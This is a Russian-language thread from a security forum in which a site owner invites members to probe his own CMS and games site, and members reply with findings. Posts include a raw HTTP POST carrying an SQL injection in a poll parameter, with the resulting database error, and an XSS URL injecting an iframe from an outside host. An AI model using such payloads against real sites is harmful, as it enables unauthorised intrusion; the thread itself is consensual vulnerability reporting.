HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 23.11.2007, 16:38
AlexALX
Новичок
Регистрация: 27.10.2007
Сообщений: 12
С нами: 9757346

Репутация: 2
По умолчанию

Цитата:
Сообщение от Scipio  
несовсем понял возможен ли инклюд локальный (чет не до ковыряния сейчас, сплю почти) но раскрытие путей опять же, в пост-переменной user_theme при редактировании профиля (edit_profile.php)
чёт не понял...

Насчёт
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3

Тоже не выхожит уже чёто (обновлял двиг)

а вот [pasкрытие путей] пашет...
 
Ответить с цитированием

  #22  
Старый 04.12.2007, 22:05
xXvladXx
Участник форума
Регистрация: 28.10.2007
Сообщений: 143
С нами: 9756326

Репутация: 162
По умолчанию

скуль
POST /articles.php?cat_id=5 HTTP/1.1
Host: alexalx-soft.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

voteoption=1&voteoption=1&voteoption=1&voteoption= 1&voteoption=1&voteoption="&poll_id=1&cast_vote= 1
посли выполнения пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"=poll_votes_\"+1, poll_ips='|83.243.*.*' WHERE poll_id=1' at line 1
 
Ответить с цитированием

  #23  
Старый 09.12.2007, 12:36
AlexALX
Новичок
Регистрация: 27.10.2007
Сообщений: 12
С нами: 9757346

Репутация: 2
По умолчанию

http://alexalx-soft.com/games/ - сам писал, можете потестировать, а то я могу дето и sql иньекцию случайно сделать...
 
Ответить с цитированием

  #24  
Старый 09.12.2007, 13:33
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами: 10787366

Репутация: 2277
По умолчанию

xss

http://alexalx-soft.com/games/index.php?show=%C3'w%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C


p.s. какой-то он у тебя тяжелый =\ /*трафик*/
 
Ответить с цитированием

  #25  
Старый 09.12.2007, 13:48
AlexALX
Новичок
Регистрация: 27.10.2007
Сообщений: 12
С нами: 9757346

Репутация: 2
По умолчанию

Цитата:
Сообщение от halkfild  
xss

http://alexalx-soft.com/games/index.php?show=%C3'w%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C


p.s. какой-то он у тебя тяжелый =\ /*трафик*/
спасибо что нашёл и сказал)
 
Ответить с цитированием

  #26  
Старый 24.01.2008, 17:56
AlexALX
Новичок
Регистрация: 27.10.2007
Сообщений: 12
С нами: 9757346

Репутация: 2
По умолчанию

http://alexalx-soft.com/games/ - проверте плиз, сделал полностью базу игр.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.